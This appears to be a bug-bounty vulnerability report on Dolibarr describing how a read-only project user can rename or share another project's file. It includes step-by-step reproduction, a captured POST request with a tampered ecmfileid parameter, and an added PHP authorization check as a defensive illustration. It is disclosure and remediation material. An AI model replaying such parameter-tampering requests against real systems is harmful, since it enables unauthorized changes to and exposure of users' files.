Improper Privilege Management in dolibarr/dolibarr
Reported on
May 19th 2021
💥 BUG
Unprivileged user can edit/share a linked file of a project.
💥 VIDEO
https://drive.google.com/file/d/1YaiG0vjFTuqZRck7dMLqkhT7HSZqaEdu/view?usp=sharing
💥 STEP TO REPRODUCE
1. From the admin account, add user B as a normal user.
Now give user B the permission below for the Project module:
----> Read projects and tasks (shared project and projects I'm contact for). Can also enter time consumed, for me or my hierarchy, on assigned tasks (Timesheet)
2. Now from the admin account go to https://localhost/dolibarr/htdocs/projet/index.php?mainmenu=project&leftmenu=
and create a project.
Now add user B to this project as a contributor.
Also upload a file there.
3. Finally go to user B's account and visit the above project. Here user B can't edit the above uploaded document.
Now user B sends the request below in Burp Suite to edit/share the document.
POST /dolibarr/htdocs/projet/document.php?&id=1&file=PJ2105-0001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 275
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr/htdocs/projet/document.php?action=editfile&urlfile=PJ2105-0001%2FPJ2105-0001-simple.html.noexe&id=1&file=PJ2105-0001&page_y=504
Cookie: DOLSESSID_0553a67aec6c8cfb8172aadb09812143=4ueq8h2hcsro2cicatu2umspk9
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2
token=$2y$10$eIz0ktTX4BELW6Fo.nN3NeeCTrlUUouAR.pwUqzkRAdBKaN.u3DVy&action=renamefile&id=1&modulepart=project&section_dir=PJ2105-0001%2F&renamefilefrom=PJ2105-0001-simple.html.noexe&renamefileto=PJ2105-0001-sssimplse.html.noexe&shareenabled=on&ecmfileid=22&renamefilesave=Save
Here, in this POST data, you change the ecmfileid parameter value to your file id.
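The root cause in the request above is that the server acts on the client-supplied ecmfileid and section_dir without binding them to a project the user may write to. The following is an added illustration of the server-side check such a rename/share handler needs; it is not Dolibarr's code. The array-backed "tables", the rights layout under $user['rights']['projet'], the contributor list and the sample user records are all assumptions constructed for this example.

```php
<?php
// Added illustration of the authorization check a rename/share handler needs
// before acting on ecmfileid. Not Dolibarr's code: the array-backed "tables",
// the rights layout and the contributor list are assumptions.

// Constructed sample rows standing in for the ECM file table and the project table.
$ecmFiles = [
    22 => ['modulepart' => 'project', 'filepath' => 'PJ2105-0001', 'filename' => 'PJ2105-0001-simple.html.noexe'],
    23 => ['modulepart' => 'project', 'filepath' => 'PJ2105-0002', 'filename' => 'quote.pdf'],
];
$projects = [
    1 => ['ref' => 'PJ2105-0001', 'contributors' => ['B']],
    2 => ['ref' => 'PJ2105-0002', 'contributors' => []],
];

// Decide whether $user may rename or share the file named by the request fields.
function canModifyLinkedFile(array $user, int $projectId, string $sectionDir,
                             int $ecmFileId, string $newName,
                             array $projects, array $ecmFiles): bool
{
    // 1. A read-only project permission (the one granted in step 1) must never
    //    be enough to rename or share; require an explicit write right.
    if (empty($user['rights']['projet']['creer'])) {
        return false;
    }
    // 2. The project named by id= must exist and the user must be allowed to
    //    modify it (admin or a contributor), not merely to read it.
    if (!isset($projects[$projectId])) {
        return false;
    }
    $project = $projects[$projectId];
    if (!$user['admin'] && !in_array($user['login'], $project['contributors'], true)) {
        return false;
    }
    // 3. The row referenced by ecmfileid must belong to this project. Without this
    //    binding, ecmfileid can be pointed at any file row in the system.
    if (!isset($ecmFiles[$ecmFileId])) {
        return false;
    }
    $file = $ecmFiles[$ecmFileId];
    if ($file['modulepart'] !== 'project' || $file['filepath'] !== $project['ref']) {
        return false;
    }
    // 4. section_dir comes from the client; it must agree with the stored row
    //    rather than being used as the target directory on its own.
    if (rtrim($sectionDir, '/') !== $file['filepath']) {
        return false;
    }
    // 5. The new name must stay inside the project's directory (no path components).
    if ($newName === '' || basename($newName) !== $newName) {
        return false;
    }
    return true;
}

// User B as configured in step 1: read-only project right, contributor on project 1.
$userB = ['login' => 'B', 'admin' => false,
          'rights' => ['projet' => ['lire' => true, 'creer' => false]]];
// The same account with a write right on projects, for contrast.
$editor = ['login' => 'B', 'admin' => false,
           'rights' => ['projet' => ['lire' => true, 'creer' => true]]];

// The fields from the captured POST body above.
$req = ['id' => 1, 'section_dir' => 'PJ2105-0001/', 'ecmfileid' => 22,
        'renamefileto' => 'PJ2105-0001-sssimplse.html.noexe'];

var_dump(canModifyLinkedFile($userB, $req['id'], $req['section_dir'],
    $req['ecmfileid'], $req['renamefileto'], $projects, $ecmFiles));
var_dump(canModifyLinkedFile($editor, $req['id'], $req['section_dir'],
    $req['ecmfileid'], $req['renamefileto'], $projects, $ecmFiles));
// Same editor, but ecmfileid swapped to a row that belongs to another project.
var_dump(canModifyLinkedFile($editor, $req['id'], $req['section_dir'],
    23, $req['renamefileto'], $projects, $ecmFiles));
```

Run with `php check.php`: the first call (user B with only the read right) and the third call (a file row from a different project) are denied, and only the second call, where the user holds a write right on a project that actually owns the referenced file, is allowed. The point of step 3 in the function is that the permission decision is made on the file row's recorded owner, not on the project id or section_dir the client chose to send.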
💥 Impact
Privilege escalation bug.
Some fixes were done on issues related to similar troubles. I am not sure this is fixed. Will need to recheck once v14 has been released or on develop branch after the 22nd of May 2021.